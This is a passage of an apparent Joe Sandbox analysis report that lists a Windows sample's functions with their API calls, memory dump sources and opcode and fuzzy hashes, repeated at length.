                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000001F.00000002.1932835041.0000000000401000.00000020.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1932805887.0000000000400000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1932944234.000000000053D000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1932991947.0000000000555000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1932991947.0000000000562000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933070346.0000000000628000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933122608.0000000000674000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933192683.00000000006E7000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933222066.00000000006EA000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933249657.00000000006F5000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933282783.00000000006F9000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933314038.0000000000700000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933349244.0000000000703000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933377675.0000000000709000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933407438.000000000070E000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933443184.000000000073C000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933473851.000000000073F000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_31_2_400000_1061714629.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: CriticalSection$EnterLeave$Devswave
                                                                                                                                                                                                                                                                                                        • String ID: echosuppression$gain
                                                                                                                                                                                                                                                                                                        • API String ID: 967401230-1829011300
                                                                                                                                                                                                                                                                                                        • Opcode ID: 546b0f3ebceeb7a0da23e6f321f446937bde9f1e62618b4c4d58b1762877edae
                                                                                                                                                                                                                                                                                                        • Instruction ID: eec625d20ecc8ac728587d7ca18c0fda910ff7f544bd80cb39fcd025b5d808b6
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 546b0f3ebceeb7a0da23e6f321f446937bde9f1e62618b4c4d58b1762877edae
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4C118E35700B449BC711EB67C9A1A2BB3B9BF8871AB15049EE5464B741CB24FC02CBA4
                                                                                                                                                                                                                                                                                                        Function 00509EC0 Relevance: 6.1, APIs: 4, Instructions: 61COMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                          • Part of subcall function 0050B060: CreateEventA.KERNEL32(00000000,?,00000000,00000000,00000000,00509F02,00000000,00000000,?,0000007C,?,00000004,00000000,00000008,00000000,004F924E), ref: 0050B06E
                                                                                                                                                                                                                                                                                                        • InitializeCriticalSection.KERNEL32(0000007C,00000001,00000001,00000000,00000000,?,0000007C,?,00000004,00000000,00000008,00000000,004F924E,00549D98,?,?), ref: 00509F34
                                                                                                                                                                                                                                                                                                        • InitializeCriticalSection.KERNEL32(00000094,?,?,?,?,?,?,?,?,7772FFB0), ref: 00509F3D
                                                                                                                                                                                                                                                                                                        • InitializeCriticalSection.KERNEL32 ref: 00509F6E
                                                                                                                                                                                                                                                                                                        • SetEvent.KERNEL32 ref: 00509F74
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000001F.00000002.1932835041.0000000000401000.00000020.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1932805887.0000000000400000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1932944234.000000000053D000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1932991947.0000000000555000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1932991947.0000000000562000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933070346.0000000000628000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933122608.0000000000674000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933192683.00000000006E7000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933222066.00000000006EA000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933249657.00000000006F5000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933282783.00000000006F9000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933314038.0000000000700000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933349244.0000000000703000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933377675.0000000000709000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933407438.000000000070E000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933443184.000000000073C000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933473851.000000000073F000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_31_2_400000_1061714629.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: CriticalInitializeSection$Event$Create
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 662013055-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 8b41bb8ea36a2531d5352067329df235b3019d45486671b4f72c125a1e36c2c0
                                                                                                                                                                                                                                                                                                        • Instruction ID: a00b6d7b902e657a52a59b9571d5736a80dfe09fbfe7896e9036a1fe9281f1e6
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8b41bb8ea36a2531d5352067329df235b3019d45486671b4f72c125a1e36c2c0
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9B21C4B1540B049FE320DF6AD884A9BFBE8FF94704F00490EE1AA83661D7B1B405CB61
                                                                                                                                                                                                                                                                                                        Function 004D2AA0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • GetSystemDirectoryA.KERNEL32(?,00000105), ref: 004D2AB9
                                                                                                                                                                                                                                                                                                        • CreateCompatibleDC.GDI32(00000000), ref: 004D2B3D
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000001F.00000002.1932835041.0000000000401000.00000020.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1932805887.0000000000400000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1932944234.000000000053D000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1932991947.0000000000555000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1932991947.0000000000562000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933070346.0000000000628000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933122608.0000000000674000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933192683.00000000006E7000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933222066.00000000006EA000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933249657.00000000006F5000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933282783.00000000006F9000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933314038.0000000000700000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933349244.0000000000703000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933377675.0000000000709000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933407438.000000000070E000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933443184.000000000073C000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933473851.000000000073F000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_31_2_400000_1061714629.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: CompatibleCreateDirectorySystem
                                                                                                                                                                                                                                                                                                        • String ID: Macromed\Flash\
                                                                                                                                                                                                                                                                                                        • API String ID: 2606042488-1438515271
                                                                                                                                                                                                                                                                                                        • Opcode ID: d451729974a22e2174cc262673041bd25aa8ed66c57df716bc48c0d66078c0ab
                                                                                                                                                                                                                                                                                                        • Instruction ID: 299e9cb63676f09c6c690dce7675c16131e739682a5e940449f79e26451de6f9
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d451729974a22e2174cc262673041bd25aa8ed66c57df716bc48c0d66078c0ab
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8F118A711047016FC704EF21EC52AAF77E4BF98704F40491EF19943281DB78A908CFAA
                                                                                                                                                                                                                                                                                                        Function 004F2BF0 Relevance: 5.1, APIs: 4, Instructions: 99COMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • EnterCriticalSection.KERNEL32(?,?,?,?,?,004F5B22,00000001,000000FF), ref: 004F2BFE
                                                                                                                                                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 004F2C88
                                                                                                                                                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 004F2CCE
                                                                                                                                                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 004F2CF1
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000001F.00000002.1932835041.0000000000401000.00000020.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1932805887.0000000000400000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1932944234.000000000053D000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1932991947.0000000000555000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1932991947.0000000000562000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933070346.0000000000628000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933122608.0000000000674000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933192683.00000000006E7000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933222066.00000000006EA000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933249657.00000000006F5000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933282783.00000000006F9000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933314038.0000000000700000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933349244.0000000000703000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933377675.0000000000709000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933407438.000000000070E000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933443184.000000000073C000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933473851.000000000073F000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_31_2_400000_1061714629.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: CriticalSection$Leave$Enter
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 2978645861-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 72ef37a4ce696f50df890290b9b7b99c0f9e4ea6355bbf9b4210c3caf82ba29b
                                                                                                                                                                                                                                                                                                        • Instruction ID: d821757bbb06b5f881817bb4be3b83133dcd2ebdcf47b2e92145d0cebd45ebc1
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 72ef37a4ce696f50df890290b9b7b99c0f9e4ea6355bbf9b4210c3caf82ba29b
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D631D2762042854FD3248F29D898A3BBBF5EFD9351F19856EE696C7381C779D808C720
                                                                                                                                                                                                                                                                                                        Function 004F64A0 Relevance: 5.0, APIs: 4, Instructions: 45COMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • EnterCriticalSection.KERNEL32(?,?,?,00000000,?,004F7247,?), ref: 004F64C1
                                                                                                                                                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 004F64E6
                                                                                                                                                                                                                                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 004F64EC
                                                                                                                                                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 004F6515
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000001F.00000002.1932835041.0000000000401000.00000020.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1932805887.0000000000400000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1932944234.000000000053D000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1932991947.0000000000555000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1932991947.0000000000562000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933070346.0000000000628000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933122608.0000000000674000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933192683.00000000006E7000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933222066.00000000006EA000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933249657.00000000006F5000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933282783.00000000006F9000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933314038.0000000000700000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933349244.0000000000703000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933377675.0000000000709000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933407438.000000000070E000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933443184.000000000073C000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933473851.000000000073F000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_31_2_400000_1061714629.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: CriticalSection$EnterLeave
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 3168844106-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: f847da26358d00d5442f5224005a34bf56e55c89d248726b642e497024ea2ade
                                                                                                                                                                                                                                                                                                        • Instruction ID: c39e4b2d7a975ea5970b06f88a1f0ae82272a8bb6f48ad921d14b69448efe04b
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f847da26358d00d5442f5224005a34bf56e55c89d248726b642e497024ea2ade
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: FC0188352003485BC714EF24D880A77F3A9AF46258B19559DE5C657342CA39EC06CBA4
                                                                                                                                                                                                                                                                                                        Function 00401380 Relevance: 5.0, APIs: 4, Instructions: 39COMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 0040139D
                                                                                                                                                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 004013B3
                                                                                                                                                                                                                                                                                                        • EnterCriticalSection.KERNEL32(00000005), ref: 004013CA
                                                                                                                                                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(00000005), ref: 004013D8
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000001F.00000002.1932835041.0000000000401000.00000020.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1932805887.0000000000400000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1932944234.000000000053D000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1932991947.0000000000555000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1932991947.0000000000562000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933070346.0000000000628000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933122608.0000000000674000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933192683.00000000006E7000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933222066.00000000006EA000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933249657.00000000006F5000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933282783.00000000006F9000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933314038.0000000000700000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933349244.0000000000703000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933377675.0000000000709000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933407438.000000000070E000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933443184.000000000073C000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933473851.000000000073F000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_31_2_400000_1061714629.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: CriticalSection$EnterLeave
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 3168844106-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: be455565a85d393211932c010ec7194a6f72a0f8e03aef377b487af276531eef
                                                                                                                                                                                                                                                                                                        • Instruction ID: 1dc668918495c93d19b35d2f921703afc781594381be1afc9f76799b5a6aac2f
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: be455565a85d393211932c010ec7194a6f72a0f8e03aef377b487af276531eef
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 280112B620070AAFC310CF69D884946FBF8FFA8314B10C55AE95983711C771F956CBA0

                                                                                                                                                                                                                                                                                                        Executed Functions

                                                                                                                                                                                                                                                                                                        Function 007A9098 Relevance: 2.7, APIs: 2, Instructions: 163memoryCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • VirtualAlloc.KERNELBASE(00000000,00001012,00001000,00000004), ref: 007A90C1
                                                                                                                                                                                                                                                                                                        • VirtualFree.KERNELBASE(00000000,00000000,?), ref: 007A926D
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000022.00000003.1903619913.0000000000770000.00000040.00000400.00020000.00000000.sdmp, Offset: 00770000, based on PE: true
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_34_3_770000_1061714629.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Virtual$AllocFree
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 2087232378-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 7dc8e79fde86babc96161718fc4e5f80a5398d7d893a888eaa0e52eee754c683
                                                                                                                                                                                                                                                                                                        • Instruction ID: 3da77de92bf0c33bc52e49a700e110508d5e24bdc964440293630acdd4b79e25
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7dc8e79fde86babc96161718fc4e5f80a5398d7d893a888eaa0e52eee754c683
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9E719C71D0424ADFCB41CF98C881BEEBBF0BB4A314F244195E665F7281D238AA91DF65
                                                                                                                                                                                                                                                                                                        Function 007A92CC Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 129memoryCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,00000000,?,?), ref: 007A9314
                                                                                                                                                                                                                                                                                                          • Part of subcall function 007A9098: VirtualAlloc.KERNELBASE(00000000,00001012,00001000,00000004), ref: 007A90C1
                                                                                                                                                                                                                                                                                                          • Part of subcall function 007A9098: VirtualFree.KERNELBASE(00000000,00000000,?), ref: 007A926D
                                                                                                                                                                                                                                                                                                        • VirtualAlloc.KERNELBASE(00000000,00400000,00001000,00000004), ref: 007A9366
                                                                                                                                                                                                                                                                                                        • VirtualProtect.KERNELBASE(0000002C,?,00000040,0000002C), ref: 007A93C0
                                                                                                                                                                                                                                                                                                        • VirtualFree.KERNELBASE(00000000,00000000,?), ref: 007A93F3
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000022.00000003.1903619913.0000000000770000.00000040.00000400.00020000.00000000.sdmp, Offset: 00770000, based on PE: true
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_34_3_770000_1061714629.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Virtual$Alloc$Free$Protect
                                                                                                                                                                                                                                                                                                        • String ID: ,
                                                                                                                                                                                                                                                                                                        • API String ID: 1004437363-3772416878
                                                                                                                                                                                                                                                                                                        • Opcode ID: 846e80d9192284de11e110977aaee4205ca63ec1a267e246cbf1a7208dcc7df3
                                                                                                                                                                                                                                                                                                        • Instruction ID: fdc3e14bfe8bd98f10242a0524754a491cccef1a7c378bc05cf1da2b973c4246
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 846e80d9192284de11e110977aaee4205ca63ec1a267e246cbf1a7208dcc7df3
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0E51F975900709EFCB10DFA9C885A9EBBF4FF49344F10851AFA59A7240D374E951CBA4
                                                                                                                                                                                                                                                                                                        Function 007A0BA2 Relevance: 7.7, APIs: 5, Instructions: 197COMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000022.00000003.1903619913.0000000000770000.00000040.00000400.00020000.00000000.sdmp, Offset: 00770000, based on PE: true
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_34_3_770000_1061714629.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: __freea$__alloca_probe_16
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 3509577899-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: ce9059a0f54269a3e857cd05decacb9db5d80458a844bd6716999fbfe2567560
                                                                                                                                                                                                                                                                                                        • Instruction ID: fd6922cf7a80161dd0570e670522332710b0b795b89aff0777e773291c4cc3ee
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ce9059a0f54269a3e857cd05decacb9db5d80458a844bd6716999fbfe2567560
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 34519373700606AFEB215FA4CC89EBB7BA9DFC6710B150B29FD0496151E738ED5086A1
